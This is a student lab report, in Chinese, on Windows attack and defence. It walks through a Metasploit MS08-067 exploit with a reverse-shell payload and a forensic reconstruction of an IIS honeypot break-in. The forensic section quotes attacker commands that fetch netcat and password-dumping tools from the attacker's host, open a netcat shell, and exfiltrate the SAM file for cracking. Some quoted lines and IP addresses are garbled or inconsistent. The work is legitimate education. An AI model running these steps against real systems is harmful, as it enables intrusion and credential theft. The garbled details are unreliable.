20212923 2021-2022-2 《網絡攻防實踐》第六次作業

20212923 2021-2022-2 《網絡攻防實踐》第六次作業

實踐六：Windows操作系統安全攻防

課程：《網絡攻防實踐》

班級： 2129

姓名： 王文彬

學號：20212923

實驗教師：王志強

實驗日期：2022年04月24日

必修/選修： 選修

一.實踐內容

1. 實踐要求介紹

• 動手實踐Metasploit windows attacker
  • 使用windows Attacker/BT4攻擊機嘗試對windows Metasploitable靶機上的MS08-067漏洞進行遠程滲透攻擊，獲取目標主機的訪問權
• 取證分析實踐：解碼一次成功的NT系統破解攻擊
  • 來自212.116.251.162的攻擊者成功攻陷了一臺由rfp部署的蜜罐主機172.16.1.106,(主機名爲lab.wiretrip.net)，要求提取並分析攻擊的全部過程
    • 攻擊者使用了什麼破解工具進行攻擊；
    • 攻擊者如何使用這個破解工具進入並控制了系統；
    • 攻擊者獲得系統訪問權限後做了什麼；
    • 攻擊者獲得系統訪問權限後做了什麼；
    • 你覺得攻擊者是否警覺了他的目標是一臺蜜罐主機？如果是，爲什麼
• 團隊對抗實踐：windows系統遠程滲透攻擊和分析
  • 攻方使用metasploit選擇漏洞進行攻擊，獲得控制權。（要求寫出攻擊方的同學信息、使用漏洞、相關IP地址等）；
  • 防守方使用wireshark監聽獲得的網絡數據包，分析攻擊過程，獲取相關信息。

普通網絡服務查點

• DNS服務

  • DNS區域傳送
    • nslookup:default server
    • ls -d Domain_DNS_NAME
  • 阻斷DNS區域傳送
    • MMC控制檯配置DNS服務去掉Allow Zone Transfers，禁止區域傳送

• 主機查點-NetBIOS網絡查點

  • 使用net view查點域

    • 列出網絡上的工作組和域： net view / domain；
    • 列出指定組／域中的所有計算機：net view /domain:DOMAIN_NAME；

  • 識別域控制器

    • nltest /dclist:DOMAIN_NAME

  • 查看NetBIOS名字表

    • 列舉： 自帶工具nbtstat -A TARGET_IP；

    • 掃描： 免費工具nbtscan

• Windows系統遠程攻擊

  • Windows獨有組網協議和服務
  • SMB（遠程口令猜測）MSRPC,LSASS；
  • 各種網絡服務在Windows平臺的具體實現
  • IIS, MS SQL Server,遠程桌面
  • 社會工程學、 攻擊客戶端軟件等

• 遠程口令字猜測

  • Windows文件與打印共享服務-SMB

    • TCP 139: NetBIOS Session Service
    • TCP 445: SMB over HTTP直連主機服務

  • 攻擊點：默認開放的隱藏共享卷

    • IPC$：進程間通信

  • 目標系統用戶名單

    • 通過查點方法收集用戶帳戶信息：dumpsec
    • 內建用戶：Guest, Administrator

  • 自動方式

    • FOR批處理
    • 免費軟件： Legion、 NetBIOS Auditing Tool
    • 商業軟件： SMBGrind （併發，快速）
    • 國內軟件： XScan, 小椿軟件之流光

  • 口令字猜測方法

    • 空白口令
    • 弱口令（高概率組合）
    • 字典攻擊
    • 暴力破解

• 遠程口令字防禦策略

  • 網絡防火牆：限制TCP139/445端口訪問
  • 主機級安防機制限制對SMB的訪問
    • IPSec過濾器
    • Windows防火牆
    • 禁用SMB服務放棄Windows文件和打印共享
    • 制定和實施強口令字策略
    • 設置帳戶鎖定闕值
    • 激活帳戶登錄失敗事件審計功能，定期查看EventLog
    • 用入侵檢測／防禦系統進行實時報警和防禦

2.實踐過程

實踐一：動手實踐Metasploit windows attacker

機器	IP地址
Kali Linux	192.168.200.69
windows2k	192.168.200.124

（1）我們首先需要確保攻擊機和靶機之間能夠進行互通，相互發送ICMP包進行測試：

（2）在命令行中輸入msfconsole，打開直接打開Metasploit：

（3）輸入search MS08_067查看該漏洞信息

（4）輸入use exploit/windows/smb/ms08_067_netapi選擇使用相關腳本，使用set payload generic/shell_reverse_tcp選擇你要用的攻擊負載模塊：

（5）我們可以通過使用show options查看當前攻擊腳本所需要設置的參數；

（6）使用set RHOST 192.168.13.9設置靶機爲win2k，set LHOST 192.168.13.8設置攻擊機爲kali，再show options查看是否配置成功，如圖：

（7）輸入exploit開始攻擊，要注意目標主機的445端口要開放，查看445端口是否開放之後，如果沒有開放，則需要開啓445端口。攻擊成功之後輸入若干命令進行測試：

實踐二：取證分析實踐：解碼一次成功的NT系統破解攻擊

使用wireshark打開[email protected]，大致瀏覽文件後，可以發現日誌文件由以下內容組成：

• 可識別的HTTP協議內容
• 可識別的SQL語言代碼內容
  = 可識別的系統操作代碼內容
• 不可識別的數據（二進制數據）

• 攻擊場景
  • 被攻擊目標： rfp的個人網站(lab.wiretrip.net)，基千NT和11S；
  • 攻擊者：來自 213.116.251.162
• Unicode漏洞 CMS00-078/MSOl-026)
• Google "WEB-11S MDAC Content-Type overflow attempt"
  • MDAC RDS漏洞 CMS02-065
• 攻擊者可能利用了11S的Unicode漏洞和MDACRDS組件漏洞攻陷了蜜罐主機；
  並通過netcat構建了遠程shell連接
• Unicode攻擊原理解釋
  • 利用微軟IIS4.0和5.0都存在利用擴展UNICODE字元取代“\”和“/”，而能利用“../”目錄遍歷的漏洞。
  • 未經授權的用戶可能利用IUSR_machinename賬號的上下文空間訪問任何已知的文件。

（1）攻擊者使用了什麼破解工具進行攻擊

• 從攻擊主機X首先訪問了蜜罐T上的http://lab.wiretrip.net/Default.htm頁面
  • 其User-Agent域設置爲Mozilla/4.0
  • Accept字段中顯示訪問主機安裝了MS word等軟件；
  • 推測主機應爲NT5.0系統，安裝了MSIE5.01和Hotbar2.0插件。

• 攻擊者利用了Unicode攻擊（針對MSOO-078/MSOl-026) 和針對msadcs.dll中RDS漏洞 (MS02-065)的msadc.pl/msadc2.pl滲透攻擊工具進行了攻擊。如下圖：

（2）攻擊者如何使用這個破解工具進入並控制了系統

• 階段一：
  • 通過FTP腳本嘗試在目標主機下載工具(pdump/samdump/netcat)由於記錯口令失敗，如下圖：
  • 多次嘗試編寫FTP腳本出錯， 失敗；
    • SESSION: 1874-SO"copy C:\winnt\syste m32\cmd.exe cmdl.exe"
    • SESSION:1875-SO"cmdl.exe /c open 213.116 .251.162 >ftpcom"
    • SESSION:1876-SO"cmdl.exe /c echo johna2k >>ftpcom"
    • SESSION:1877-SO"cmdl.exe /cecho haxedjOO >>ftpcom"
    • SESSION:1879-SO"cmdl.exe /cecho get nc.exe >>ftpcom"
    • SESSION:1880-SO"cmdl.exe /cecho get pdum p.exe >>ftpcom"
    • SESSION:1881-SO"cmdl.exe /cecho get samdum p.dll >>ft pcom"
    • SESSION:1882-SO"cmdl.exe /cecho quit >>ftpcom"
    • SESSION:1885-SO"cmdl.exe /cftp -s:ftpcom"
• 階段二：
  • 通過Netcat獲得遠程訪問shell, 正式獲得遠程訪問權
    • SESSION:1887-SO"cmdl.exe /c nc -I -p 6969 -e cmdl.exe"
    • 20:42:47 X: 1888 -> T:6969 incomin g NC cmd.exe sessi on: see./log/ 17 2.16.1.106/SESSION :6969-1888

（3）攻擊者獲得系統訪問權限後做了什麼

• 本地權限提升

  • 攻擊者目前獲取的遠程訪問權限
    • IIS啓動帳戶： IUSR_machimachinename；
    • 能夠通過MDACRDS以SYSTEM賬號權限運行任意指令；
    • 攻擊者目標： 獲取本地Administrator權限

• 本次權限提升-刺探用戶組信息
  

• 本地權限提升－再次嘗試pdump

  • 再次嘗試pdump
    • 20:58:08 X:1888 -> T:6969 interactive (netcat): 'pdump' ，仍然失敗
  • 放棄pdump
    • 21:05:27 X:1888 -> T:6969 interactive (netcat):'delpdump.exe' and 'del samdump.dll'
      

• 本地權限提升-獲取SAM備份

  • rdisk /s-備份關鍵信息，在\repair目錄中就會創建一個名爲sam._的SAM壓縮拷貝，備份的san._文件在使用之前需要通過expand進行擴展。

  • 開啓另外一個Netcat遠程shell

    • 21:10:42X:1987-> T:80 exec (unicode)'nc -I -p 6969 -e cmdl.exe'
    • 21:10:46X:1988-> T:6969failed (RST) incoming netcat session
    • 21:10:54X:1989-> T:6969 failed again
    • 21:11:19X:1992-> T:80 exec (unicode) nc -1 -p 6968-e cmdl.exe
    • 21:11:24X:1993-> T:6968 incoming NC cmd.exe session: see./log/ 17 2.16.1.106/SESSION :6969-1888

  • 將SAM備份文件拷貝至IIS的根目錄inetpub, 並通過Web方式下載了該文件

    • 21:12:22X:1993-> T:6968 interactive (netcat): copies；c:\har.txt to inetpub
    • 21:12:32X:1995-> T:80 get /har.txt (sam._)
    • 21:15:23X:1998-> T:80 exec (msadc):'del c: \i net pub\ wwwroot\har. txt'；c:\inetpub\wwwroot\har.txt'
    • 21:16:32T:6968-> X:1993 second nc session ends
      

  • 攻擊機上使用 LOphtcrack進行口令字破解： ｀SOuthP'，完成權限提升

（4）如何防止這樣的攻擊？

• 直接防禦措施：打補丁
  • Unicode - http://www.microsoft.com/technet/securitv /bulletin/ms00-057.asp
  • RDS - htto:/ /www.microsoft.com/technet/securitv /Bulletin/ MS02-065.msox
• 進一步防禦措施：IIS安全防範措施
  • 爲這些漏洞打上補丁
  • 禁用用不着的RDS等服務
  • 防火牆封禁網絡內部服務器發起的連接
  • 爲webserver在單獨的文件捲上設置虛擬根目錄
  • 使用NTFS文件系統， 因爲FAT幾乎不提供安全功能
  • 使用IIS Lockdown 和 URLScan 等工具加強web server

（5）攻擊者是否警覺了他的目標

• 攻擊者意識到了他的目標是作爲蜜罐主機的；
  • 攻擊者建立了一個文件，並且輸入瞭如下內容
  • 因爲該目標主機作爲rfp的個人網站，Web服務所使用的IIS甚至沒有更新rfp自己所發現的MDAC RDS安全漏洞，很容易讓攻擊者意識到這是個誘餌。
    

實踐三：團隊對抗實踐：windows系統遠程滲透攻擊和分析

本方攻擊機及IP	本方靶機及IP	對方攻擊機及IP	對方靶機及IP
Kali Linux 192.168.116.127	Windows2k 192.168.116.66	Kali Linux 192.168.116.127	Windows2k 192.168.116.71

攻擊方實踐

（1）打開msfconsole，選擇相應攻擊腳本、負載，設置腳本所需要的參數；

（2）輸入exploit進行攻擊後，我們在靶機方創建了一個名叫wjswez的文件夾

靶機方實踐

（1）作爲靶機，我們可以打開wireshark進行等待抓包

（2）我們可以看到攻擊機在靶機的445端口建立連接；

（3）一些SMB協議數據包；

（4）可以看到攻擊機在我方靶機上創建了一個文件夾，然後結束本次攻擊。

二、 實驗過程中遇到的問題和解決過程

1. 配置windoes橋接時，出現找不到vmnet0網卡的情況

• 我們需要在關閉所有虛擬機的前提下進行對網卡的初始化，對vmware網卡重新進行安裝。ps：需要在服務中開啓Devise install Devise服務.

三、感想

在此次實踐中，能夠充分理解攻擊靶機漏洞的機理，同時也在分析攻擊過程中，學習到了不同角色間，需要做的相關工作。

四、參考文獻

Windows攻擊技術及防禦方法